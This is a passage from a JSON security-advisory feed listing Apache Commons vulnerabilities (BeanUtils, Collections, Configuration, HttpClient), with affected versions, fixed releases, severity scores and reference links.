"https://lists.apache.org/thread.html/ebc4f019798f6ce2a39f3e0c26a9068563a9ba092cdf3ece398d4e2f%40%3Cnotifications.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/df1c385f2112edffeff57a6b21d12e8d24031a9f578cb8ba22a947a8@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/df1c385f2112edffeff57a6b21d12e8d24031a9f578cb8ba22a947a8%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/df093c662b5e49fe9e38ef91f78ffab09d0839dea7df69a747dffa86@%3Cdev.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/df093c662b5e49fe9e38ef91f78ffab09d0839dea7df69a747dffa86%40%3Cdev.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/2454e058fd05ba30ca29442fdeb7ea47505d47a888fbc9f3a53f31d0%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1f78f1e32cc5614ec0c5b822ba4bd7fc8e8b5c46c8e038b6bd609cb5@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1f78f1e32cc5614ec0c5b822ba4bd7fc8e8b5c46c8e038b6bd609cb5%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/15fcdf27fa060de276edc0b4098526afc21c236852eb3de9be9594f3@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/15fcdf27fa060de276edc0b4098526afc21c236852eb3de9be9594f3%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1565e8b786dff4cb3b48ecc8381222c462c92076c9e41408158797b5@%3Ccommits.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1565e8b786dff4cb3b48ecc8381222c462c92076c9e41408158797b5%40%3Ccommits.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/0efed939139f5b9dcd62b8acf7cb8a9789227d14abdc0c6f141c4a4c@%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/0efed939139f5b9dcd62b8acf7cb8a9789227d14abdc0c6f141c4a4c%40%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/0a35108a56e2d575e3b3985588794e39fbf264097aba66f4c5569e4f@%3Cuser.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/0a35108a56e2d575e3b3985588794e39fbf264097aba66f4c5569e4f%40%3Cuser.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/09981ae3df188a2ad1ce20f62ef76a5b2d27cf6b9ebab366cf1d6cc6@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/09981ae3df188a2ad1ce20f62ef76a5b2d27cf6b9ebab366cf1d6cc6%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/098e9aae118ac5c06998a9ba4544ab2475162981d290fdef88e6f883@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/098e9aae118ac5c06998a9ba4544ab2475162981d290fdef88e6f883%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/084ae814e69178d2ce174cfdf149bc6e46d7524f3308c08d3adb43cb@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/084ae814e69178d2ce174cfdf149bc6e46d7524f3308c08d3adb43cb%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/080af531a9113e29d3f6a060e3f992dc9f40315ec7234e15c3b339e3@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/080af531a9113e29d3f6a060e3f992dc9f40315ec7234e15c3b339e3%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/0340493a1ddf3660dee09a5c503449cdac5bec48cdc478de65858859@%3Cdev.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/0340493a1ddf3660dee09a5c503449cdac5bec48cdc478de65858859%40%3Cdev.commons.apache.org%3E" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/BEANUTILS-463" }, { "type": "WEB", "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05324755" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-beanutils" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1116665" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1091938" }, { "type": "WEB", "url": "https://access.redhat.com/solutions/869353" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2995" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2669" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/869c08899f34c1a70c9fb42f92ac0d043c98781317e0c19d7ba3f5e3@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/869c08899f34c1a70c9fb42f92ac0d043c98781317e0c19d7ba3f5e3%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451%40%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6b30629b32d020c40d537f00b004d281c37528d471de15ca8aec2cd4@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6b30629b32d020c40d537f00b004d281c37528d471de15ca8aec2cd4%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6afe2f935493e69a332b9c5a4f23cafe95c15ede1591a492cf612293@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6afe2f935493e69a332b9c5a4f23cafe95c15ede1591a492cf612293%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/66176fa3caeca77058d9f5b0316419a43b4c3fa2b572e05b87132226@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/66176fa3caeca77058d9f5b0316419a43b4c3fa2b572e05b87132226%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/65b39fa6d700e511927e5668a4038127432178a210aff81500eb36e5@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/65b39fa6d700e511927e5668a4038127432178a210aff81500eb36e5%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/4c3fd707a049bfe0577dba8fc9c4868ffcdabe68ad86586a0a49242e@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/4c3fd707a049bfe0577dba8fc9c4868ffcdabe68ad86586a0a49242e%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/42ad6326d62ea8453d0d0ce12eff39bbb7c5b4fca9639da007291346@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/42ad6326d62ea8453d0d0ce12eff39bbb7c5b4fca9639da007291346%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/40fc236a35801a535cd49cf1979dbeab034b833c63a284941bce5bf1@%3Cdev.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/40fc236a35801a535cd49cf1979dbeab034b833c63a284941bce5bf1%40%3Cdev.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3f500972dceb48e3cb351f58565aecf6728b1ea7a69593af86c30b30@%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3f500972dceb48e3cb351f58565aecf6728b1ea7a69593af86c30b30%40%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/37e1ed724a1b0e5d191d98c822c426670bdfde83804567131847d2a3@%3Cdevnull.infra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/37e1ed724a1b0e5d191d98c822c426670bdfde83804567131847d2a3%40%3Cdevnull.infra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/31f9dc2c9cb68e390634a4202f84b8569f64b6569bfcce46348fd9fd@%3Ccommits.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/31f9dc2c9cb68e390634a4202f84b8569f64b6569bfcce46348fd9fd%40%3Ccommits.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/2ba22f2e3de945039db735cf6cbf7f8be901ab2537337c7b1dd6a0f0@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/2ba22f2e3de945039db735cf6cbf7f8be901ab2537337c7b1dd6a0f0%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/2454e058fd05ba30ca29442fdeb7ea47505d47a888fbc9f3a53f31d0@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "http://advisories.mageia.org/MGASA-2014-0219.html" }, { "type": "WEB", "url": "http://apache-ignite-developers.2346864.n4.nabble.com/CVE-2014-0114-Apache-Ignite-is-vulnerable-to-existing-CVE-2014-0114-td31205.html" }, { "type": "WEB", "url": "http://commons.apache.org/proper/commons-beanutils/javadocs/v1.9.2/RELEASE-NOTES.txt" }, { "type": "WEB", "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-August/136958.html" }, { "type": "WEB", "url": "http://marc.info/?l=bugtraq\u0026m=140119284401582\u0026w=2" }, { "type": "WEB", "url": "http://marc.info/?l=bugtraq\u0026m=140801096002766\u0026w=2" }, { "type": "WEB", "url": "http://marc.info/?l=bugtraq\u0026m=141451023707502\u0026w=2" }, { "type": "WEB", "url": "http://openwall.com/lists/oss-security/2014/06/15/10" }, { "type": "WEB", "url": "http://openwall.com/lists/oss-security/2014/07/08/1" }, { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2014/Dec/23" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674128" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674812" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675266" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675387" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675689" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675898" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675972" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676091" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676110" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676303" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676375" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676931" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677110" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg27042296" }, { "type": "WEB", "url": "http://www.debian.org/security/2014/dsa-2940" }, { "type": "WEB", "url": "http://www.ibm.com/support/docview.wss?uid=swg21675496" }, { "type": "WEB", "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2014:095" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html" }, { "type": "WEB", "url": "http://www.vmware.com/security/advisories/VMSA-2014-0008.html" }, { "type": "WEB", "url": "http://www.vmware.com/security/advisories/VMSA-2014-0012.html" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2020-06-10T23:37:42Z", "nvd_published_at": "2014-04-30T10:49:00Z", "severity": "HIGH" } }, { "schema_version": "1.7.3", "id": "GHSA-wxr5-93ph-8wr9", "published": "2025-05-28T15:34:34Z", "modified": "2025-11-03T22:02:52.251771Z", "aliases": [ "CVE-2025-48734" ], "related": [ "CGA-4m3v-9fm7-3827", "CGA-4vxj-ffhj-xx7v", "CGA-6294-j3wv-p997", "CGA-65c9-4g2c-373p", "CGA-833r-vwc8-62f8", "CGA-h6g7-pxcx-m22q", "CGA-h73m-gfrj-3j4v", "CGA-hg4r-wggg-wv2r", "CGA-jqx3-wwgp-2r3g", "CGA-mh8p-6rr9-xrhf", "CGA-q9p5-pgm4-hw27", "CGA-wrw4-qfp6-7h6x", "CGA-xrg4-fgj3-f9vq" ], "summary": "Apache Commons Improper Access Control vulnerability", "details": "Improper Access Control vulnerability in Apache Commons.\n\n\n\nA special BeanIntrospector class was added in version 1.9.2. This can be used to stop attackers from using the declared class property of Java enum objects to get access to the classloader. However this protection was not enabled by default. PropertyUtilsBean (and consequently BeanUtilsBean) now disallows declared class level property access by default.\n\n\n\n\n\nReleases 1.11.0 and 2.0.0-M2 address a potential security issue when accessing enum properties in an uncontrolled way. If an application using Commons BeanUtils passes property paths from an external source directly to the getProperty() method of PropertyUtilsBean, an attacker can access the enum’s class loader via the “declaredClass” property available on all Java “enum” objects. Accessing the enum’s “declaredClass” allows remote attackers to access the ClassLoader and execute arbitrary code. The same issue exists with PropertyUtilsBean.getNestedProperty().\nStarting in versions 1.11.0 and 2.0.0-M2 a special BeanIntrospector suppresses the “declaredClass” property. Note that this new BeanIntrospector is enabled by default, but you can disable it to regain the old behavior; see section 2.5 of the user's guide and the unit tests.\n\nThis issue affects Apache Commons BeanUtils 1.x before 1.11.0, and 2.x before 2.0.0-M2.Users of the artifact commons-beanutils:commons-beanutils\n\n 1.x are recommended to upgrade to version 1.11.0, which fixes the issue.\n\n\nUsers of the artifact org.apache.commons:commons-beanutils2\n\n 2.x are recommended to upgrade to version 2.0.0-M2, which fixes the issue.", "affected": [ { "package": { "name": "commons-beanutils:commons-beanutils", "ecosystem": "Maven", "purl": "pkg:maven/commons-beanutils/commons-beanutils" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.0" }, { "fixed": "1.11.0" } ] } ], "versions": [ "1.0", "1.10.0", "1.10.1", "1.2", "1.3", "1.4", "1.4.1", "1.5", "1.6", "1.6.1", "1.7.0", "1.8.0", "1.8.0-BETA", "1.8.1", "1.8.2", "1.8.3", "1.9.0", "1.9.1", "1.9.2", "1.9.3", "1.9.4" ], "database_specific": { "last_known_affected_version_range": "\u003c= 1.10.1", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-wxr5-93ph-8wr9/GHSA-wxr5-93ph-8wr9.json" } }, { "package": { "name": "org.apache.commons:commons-beanutils2", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-beanutils2" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0-M1" }, { "fixed": "2.0.0-M2" } ] } ], "versions": [ "2.0.0-M1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-wxr5-93ph-8wr9/GHSA-wxr5-93ph-8wr9.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48734" }, { "type": "WEB", "url": "https://github.com/apache/commons-beanutils/commit/bd20740da25b69552ddef8523beec0837297eaf9" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-beanutils" }, { "type": "WEB", "url": "https://lists.apache.org/thread/s0hb3jkfj5f3ryx6c57zqtfohb0of1g9" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/06/msg00027.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2025/05/28/6" } ], "database_specific": { "cwe_ids": [ "CWE-284" ], "github_reviewed": true, "github_reviewed_at": "2025-05-28T17:37:18Z", "nvd_published_at": "2025-05-28T14:15:34Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-6hgm-866r-3cjv", "published": "2020-06-15T20:36:20Z", "modified": "2024-11-28T05:40:45.267146Z", "aliases": [ "CVE-2015-6420" ], "summary": "Insecure Deserialization in Apache Commons Collection", "details": "Serialized-object interfaces in Java applications using the Apache Commons Collections (ACC) library may allow remote attackers to execute arbitrary commands via a crafted serialized Java object.", "affected": [ { "package": { "name": "org.apache.commons:commons-collections4", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-collections4" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.1" } ] } ], "versions": [ "4.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-6hgm-866r-3cjv/GHSA-6hgm-866r-3cjv.json" } }, { "package": { "name": "commons-collections:commons-collections", "ecosystem": "Maven", "purl": "pkg:maven/commons-collections/commons-collections" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.2.2" } ] } ], "versions": [ "1.0", "2.0", "2.0.20020914.015953", "2.0.20020914.020746", "2.0.20020914.020858", "2.1", "2.1.1", "3.0", "3.0-dev2", "3.1", "3.2", "3.2.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-6hgm-866r-3cjv/GHSA-6hgm-866r-3cjv.json" } }, { "package": { "name": "net.sourceforge.collections:collections-generic", "ecosystem": "Maven", "purl": "pkg:maven/net.sourceforge.collections/collections-generic" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "4.0.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-6hgm-866r-3cjv/GHSA-6hgm-866r-3cjv.json" } }, { "package": { "name": "org.apache.servicemix.bundles:org.apache.servicemix.bundles.collections-generic", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.servicemix.bundles/org.apache.servicemix.bundles.collections-generic" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "4.01" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-6hgm-866r-3cjv/GHSA-6hgm-866r-3cjv.json" } }, { "package": { "name": "org.apache.servicemix.bundles:org.apache.servicemix.bundles.commons-collections", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.servicemix.bundles/org.apache.servicemix.bundles.commons-collections" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "3.2.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-6hgm-866r-3cjv/GHSA-6hgm-866r-3cjv.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-6420" }, { "type": "WEB", "url": "https://arxiv.org/pdf/2306.05534" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-collections" }, { "type": "WEB", "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05376917" }, { "type": "WEB", "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05390722" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r352e40ca9874d1beb4ad95403792adca7eb295e6bc3bd7b65fabcc21@%3Ccommits.samza.apache.org%3E" }, { "type": "WEB", "url": "https://www.kb.cert.org/vuls/id/581311" }, { "type": "WEB", "url": "https://www.tenable.com/security/research/tra-2017-14" }, { "type": "WEB", "url": "https://www.tenable.com/security/research/tra-2017-23" }, { "type": "WEB", "url": "http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-java-deserialization" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/78872" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-06-11T15:58:44Z", "nvd_published_at": "2015-12-15T05:59:00Z", "severity": "HIGH" } }, { "schema_version": "1.7.3", "id": "GHSA-fjq5-5j5f-mvxh", "published": "2022-05-13T01:25:20Z", "modified": "2024-02-17T05:22:18.562352Z", "aliases": [ "CVE-2015-7501" ], "summary": "Deserialization of Untrusted Data in Apache commons collections", "details": "It was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library.", "affected": [ { "package": { "name": "commons-collections:commons-collections", "ecosystem": "Maven", "purl": "pkg:maven/commons-collections/commons-collections" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.2.2" } ] } ], "versions": [ "1.0", "2.0", "2.0.20020914.015953", "2.0.20020914.020746", "2.0.20020914.020858", "2.1", "2.1.1", "3.0", "3.0-dev2", "3.1", "3.2", "3.2.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-fjq5-5j5f-mvxh/GHSA-fjq5-5j5f-mvxh.json" } }, { "package": { "name": "org.apache.commons:commons-collections4", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-collections4" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.1" } ] } ], "versions": [ "4.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-fjq5-5j5f-mvxh/GHSA-fjq5-5j5f-mvxh.json" } }, { "package": { "name": "org.apache.servicemix.bundles:org.apache.servicemix.bundles.commons-collections", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.servicemix.bundles/org.apache.servicemix.bundles.commons-collections" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.2.1" } ] } ], "versions": [ "3.2.1_1", "3.2.1_2", "3.2.1_3" ], "database_specific": { "last_known_affected_version_range": "\u003c 3.2.2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-fjq5-5j5f-mvxh/GHSA-fjq5-5j5f-mvxh.json" } }, { "package": { "name": "net.sourceforge.collections:collections-generic", "ecosystem": "Maven", "purl": "pkg:maven/net.sourceforge.collections/collections-generic" }, "versions": [ "4.01" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-fjq5-5j5f-mvxh/GHSA-fjq5-5j5f-mvxh.json" } }, { "package": { "name": "org.apache.servicemix.bundles:org.apache.servicemix.bundles.collections-generic", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.servicemix.bundles/org.apache.servicemix.bundles.collections-generic" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.01" } ] } ], "versions": [ "4.01_1" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.02", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-fjq5-5j5f-mvxh/GHSA-fjq5-5j5f-mvxh.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-7501" }, { "type": "WEB", "url": "https://access.redhat.com/security/vulnerabilities/2059393" }, { "type": "WEB", "url": "https://access.redhat.com/solutions/2045023" }, { "type": "WEB", "url": "https://arxiv.org/pdf/2306.05534.pdf" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1279330" }, { "type": "WEB", "url": "https://commons.apache.org/proper/commons-collections/release_4_1.html" }, { "type": "WEB", "url": "https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-collections" }, { "type": "WEB", "url": "https://github.com/jensdietrich/xshady-release/tree/main/CVE-2015-7501" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580." }, { "type": "WEB", "url": "https://sourceforge.net/p/collections/code/HEAD/tree" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2016-1773.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2022-11-03T22:57:31Z", "nvd_published_at": "2017-11-09T17:29:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-pvp8-3xj6-8c6x", "published": "2025-05-09T12:31:33Z", "modified": "2025-05-09T16:27:09.142756Z", "aliases": [ "CVE-2025-46392" ], "summary": "Apache Commons Configuration Uncontrolled Resource Consumption", "details": "Uncontrolled Resource Consumption vulnerability in Apache Commons Configuration 1.x.\n\nThere are a number of issues in Apache Commons Configuration 1.x that allow excessive resource consumption when loading untrusted configurations or using unexpected usage patterns. The Apache Commons Configuration team does not intend to fix these issues in 1.x. Apache Commons Configuration 1.x is still safe to use in scenarios where you only load trusted configurations. \n\nUsers that load untrusted configurations or give attackers control over usage patterns are recommended to upgrade to the 2.x version line, which fixes these issues. Apache Commons Configuration 2.x is not a drop-in replacement, but as it uses a separate Maven groupId and Java package namespace they can be loaded side-by-side, making it possible to do a gradual migration.", "affected": [ { "package": { "name": "commons-configuration:commons-configuration", "ecosystem": "Maven", "purl": "pkg:maven/commons-configuration/commons-configuration" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "1.10" } ] } ], "versions": [ "1.0", "1.0-dev-2.20021231.045254", "1.0-dev-3.20030603.101200", "1.0-dev-3.20030607.194155", "1.0-rc1", "1.0-rc2", "1.1", "1.10", "1.2", "1.2RC1", "1.2RC2", "1.3", "1.4", "1.5", "1.6", "1.7", "1.8", "1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-pvp8-3xj6-8c6x/GHSA-pvp8-3xj6-8c6x.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46392" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-configuration" }, { "type": "WEB", "url": "https://lists.apache.org/thread/y1pl0mn3opz6kwkm873zshjdxq3dwq5s" }, { "type": "WEB", "url": "https://www.cve.org/CVERecord?id=CVE-2024-29131" }, { "type": "WEB", "url": "https://www.cve.org/CVERecord?id=CVE-2024-29133" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2025-05-09T15:54:59Z", "nvd_published_at": "2025-05-09T10:15:17Z", "severity": "LOW" }, "severity": [ { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U" } ] }, { "schema_version": "1.7.3", "id": "GHSA-3832-9276-x7gf", "published": "2022-05-13T01:10:34Z", "modified": "2024-12-06T05:35:03.860614Z", "aliases": [ "CVE-2012-5783" ], "related": [ "CGA-36v2-2382-h797", "CGA-7hvw-h9c4-h6h5", "CGA-x2pj-p6gm-xpqp" ], "summary": "Improper Certificate Validation in Apache Commons HttpClient", "details": "Apache Commons HttpClient 3.x, as used in Amazon Flexible Payments Service (FPS) merchant Java SDK and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.\n\nNote that the Commons HttpClient project is [end of life](https://hc.apache.org/httpclient-legacy/). It has been replaced by the Apache HttpComponents project in its [HttpClient](https://hc.apache.org/httpcomponents-client-5.4.x/) and [HttpCore](https://hc.apache.org/httpcomponents-core-5.3.x/) modules. CVE-2012-5783 has been patched in 